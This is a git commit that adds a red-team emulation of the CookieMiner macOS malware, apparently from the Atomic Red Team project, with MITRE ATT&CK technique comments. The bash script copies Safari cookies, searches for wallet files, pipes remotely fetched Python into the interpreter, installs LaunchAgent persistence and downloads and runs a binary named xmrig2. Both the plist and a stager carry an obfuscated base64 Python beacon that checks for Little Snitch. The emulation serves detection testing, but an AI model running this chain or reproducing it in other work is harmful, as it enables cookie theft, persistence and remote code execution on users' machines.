CookieMiner Chain Reaction (#451)

* initial commit * modified output style * final url changes * Update rocke-and-roll-stage-01.sh * CookieMiner initial commit * fix binary stuff * Make quieter * Ready for primetime
2019-02-06 11:52:31 -07:00
parent a53eb4d327
commit 8e2ec0aae1
5 changed files with 104 additions and 0 deletions
@@ -0,0 +1,16 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+<key>Label</key>
+<string>cookie-miner-backdoor-launchagent.plist</string>
+<key>ProgramArguments</key>
+<array>
+<string>python</string>
+<string>-c</string>
+<string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'));</string>
+</array>
+<key>RunAtLoad</key>
+<true/>
+</dict>
+</plist>
@@ -0,0 +1,14 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+	<key>ProgramArguments</key>
+	<array>
+		<string>/Users/Shared/xmrig2</string>
+	</array>
+	<key>RunAtLoad</key>
+	<true/>
+	<key>Label</key>
+	<string>cookie-miner-payload-launchagent.plist</string>
+</dict>
+</plist>
@@ -0,0 +1,49 @@
+#! /bin/bash
+
+#   Tactic: Discovery
+#   Technique: T1033 - System Owner/User Discovery
+OUTPUT="$(id -un)"
+
+#   Tactic: Collection
+#   Technique: T1005 - Data from Local System
+cd ~/Library/Cookies
+grep -q "coinbase" "Cookies.binarycookies"
+
+#   Tactic: Collection
+#   Technique: T1074 - Data Staged
+mkdir ${OUTPUT}
+cp Cookies.binarycookies ${OUTPUT}/Cookies.binarycookies
+
+#   Tactic: Exfiltration
+#   Technique: T1002 - Data Compressed
+zip -r interestingsafaricookies.zip ${OUTPUT}
+
+#   Tactic: Exfiltration
+#   Technique: T1048 - Exfiltration Over Alternative Protocol
+#   Simulate network connection for exfiltration
+curl https://atomicredteam.io > /dev/null
+
+curl --silent https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py | python - ``
+
+#   Tactic: Discovery
+#   Technique: T1083 - File and Directory Discovery
+find ~ -name "*wallet*" > interestingfiles.txt
+cp interestingfiles.txt ${OUTPUT}/interestingfiles.txt
+
+#   Tactic: Persistence
+#   Technique: T1159 - Launch Agent
+mkdir -p ~/Library/LaunchAgents
+cd ~/Library/LaunchAgents
+curl --silent -o com.apple.rig2.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
+curl --silent -o com.proxy.initialize.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
+launchctl load -w com.apple.rig2.plist
+launchctl load -w com.proxy.initialize.plist
+
+
+cd /Users/Shared
+curl --silent -o xmrig2 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.macos
+
+#   Tactic: Defense Evasion
+#   Technique: T1222 - File Permissions Modification
+chmod +x ./xmrig2
+./xmrig2
@@ -0,0 +1,25 @@
+# import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
+# ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
+# out = ps.stdout.read()
+# ps.stdout.close()
+# if re.search("Little Snitch", out):
+#    sys.exit()
+# import urllib2;
+# UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://atomicredteam.io';t='/news.php';req=urllib2.Request(server+t);
+# req.add_header('User-Agent',UA);
+# req.add_header('Cookie',"session=BmHiW7UA/sf9C279oE2owK9LZ0c=");
+# proxy = urllib2.ProxyHandler();
+# o = urllib2.build_opener(proxy);
+# urllib2.install_opener(o);
+# a=urllib2.urlopen(req).read();
+
+# Tactic: Defense Evasion
+# Technique: T1140 - Deobfuscate/Decode Files or Information
+#
+# Tactic: Discovery
+# Technique: T1057 - Process Discovery
+#
+# Tactic: Command and Control
+# Technique: T1043 - Commonly Used Port
+#
+import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'))